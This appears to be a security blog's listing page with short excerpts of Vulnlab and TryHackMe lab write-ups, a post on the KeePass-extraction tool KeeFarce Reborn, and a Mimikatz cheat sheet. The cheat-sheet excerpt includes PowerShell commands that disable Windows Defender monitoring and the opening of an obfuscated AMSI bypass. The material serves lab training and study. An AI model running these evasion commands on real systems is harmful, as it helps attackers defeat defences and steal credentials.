Vulnlab - Kaiju
Kaiju est une chaîne Hard composée de trois machines Windows, où il faut exploiter différentes techniques avancées afin de compromettre le domaine.L’accès initial se fait grâce à l’utilisation d’identifiants par défaut sur un serveur FTP, permettant de récupérer des fichiers donnant un aperçu de la manière dont les administrateurs construisent leurs mots de passe.En construisant une wordlist à partir de ces informations, il est possible de compromettre le compte backup, qui offre un accès SSH...
Vulnlab - Kaiju
**Kaiju” is a Hard chain made up of three Windows machines, where you have to exploit various advanced techniques to compromise the domain.Initial access is gained through the use of default credentials on an FTP server, retrieving files that give an insight into how administrators construct their passwords.By building a wordlist from this information, it is possible to compromise the backup account, which provides SSH access to the machine.Then, by browsing the FileZilla FTP server logs, we ...
KeeFarce Reborn
1. introductionKeeFarce Reborn is an offensil tool for extracting the contents of an unencrypted KeePass database when it is opened on the target machine.It is based on the work of several well-known projects: KeeFarce (extraction via DLL and CLrMD injection) KeeThief (master key recovery) KeePassHax (decryption via reflection) The aim of KeeFarce Reborn is to simplify and modernize the method, while remaining compatible with as many environments as possible. 2. How it worksThe tool takes t...
KeeFarce Reborn
1. IntroductionKeeFarce Reborn est un outil offensil permettant d’extraire le contenu d’une base KeePass en clair lorsqu’’elle est ouverte sur la machine cible.Il est basé sur les travaux de plusieurs projets célèbres : KeeFarce (extraction via injection de DLL et CLrMD) KeeThief (récupération de la clé maître) KeePassHax (décryptage via reflexion) L’objectif de KeeFarce Reborn est de simplifier et moderniser la méthode en restant compatible avec un maximum d’environnements. 2. Fonctionne...
Vulnlab - Intercept
Intercept is a chain of machines consisting of two Windows servers. Initial access is gained via an SCF attack, compromising the account of a domain user. With this access, several notable elements are observed: the domain controller does not enforce LDAP signing, the compromised user has the necessary rights to join a machine to the domain, one of the servers is vulnerable to PetitPotam and has the WebClient service enabled. By combining these vulnerabilities, a Relay (RCBD) attack can be ...
Vulnlab - Tengu
Tengu is a chain of medium level machines, consisting of one Linux machine and two Windows machines. An instance of Node-RED was used to execute code on the Linux machine. The recovery of a database password was then used to compromise a domain account, which was administrator on the Linux machine. The latter had constrained delegation for the MSSQL service, making it possible to compromise the associated MSSQL server. Finally, by recovering information protected by DPAPI, it was possible to ...
Mimikatz CheatSheet
Préparation de l’environnementExécution en tant qu’administrateur1234Start-Process PowerShell_ISE -Verb RunAs Add-MpPreference -ExclusionPath "C:\Temp" Set-MpPreference -DisableRealtimeMonitoring $true Import-Module C:\Temp\Invoke-Mimikatz.ps1 Si windows defender ne peut pas être désactivé, faire un AMSI Bypass1S`eT-It`em ( ‘V’+’aR’ + ‘IA’ + (‘blE:1’+’q2') + (‘uZ’+’x’) ) ( [TYpE]( “{1}{0}”-F’F’,’rE’ ) ) ; ( Get-varI`A`BLE ( (‘1Q’+’2U’) +’zX’ ) -VaL ).”A`...
Vulnlab - Reflection
Reflection is a chain of 3 Windows machines: MS01 , WS01 and DC01. Initial access is via an SMB connection to MS01, which provides credentials to access an MSSQL database. These are used to retrieve the database’s service account and, using an NTLM Relay attack, to access the DC’s prod share, which contains the credentials of abbie.smith, a domain account. As this account has GenericAll rights on MS01, it can read the LAPS password and retrieve the credentials of the Georgia.Price account on ...
THM - Stealth
Initial accessWe start by running an nmap scan to identify open ports on the target machine. 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748Nmap scan report for 10.10.145.204Host is up (0.068s latency).Not shown: 994 filtered tcp ports (no-response)PORT STATE SERVICE VERSION139/tcp open netbios-ssn Microsoft Windows netbios-ssn445/tcp open microsoft-ds?3389/tcp open ms-wbt-server Microsoft Terminal Services|_ssl-date: 2025-06-26T14:08:53+00:00; +1s from...
THM - K2
K2 is a hard room made up of a network containing a Linux machine and 2 Windows with an AD. It allows you to practice basic attacks by confronting certain security equipment that you must try to bypass in order to achieve your goals. EnumerationAs usual, we start by running an nmap scan to identify the machine’s open ports. 12345678910111213141516171819└─$ nmap -A 10.10.18.124 -oA scanStarting Nmap 7.94SVN ( https://nmap.org ) at 2025-06-21 15:50 EDTNmap scan report for k2.thm (10.10.18.124)H...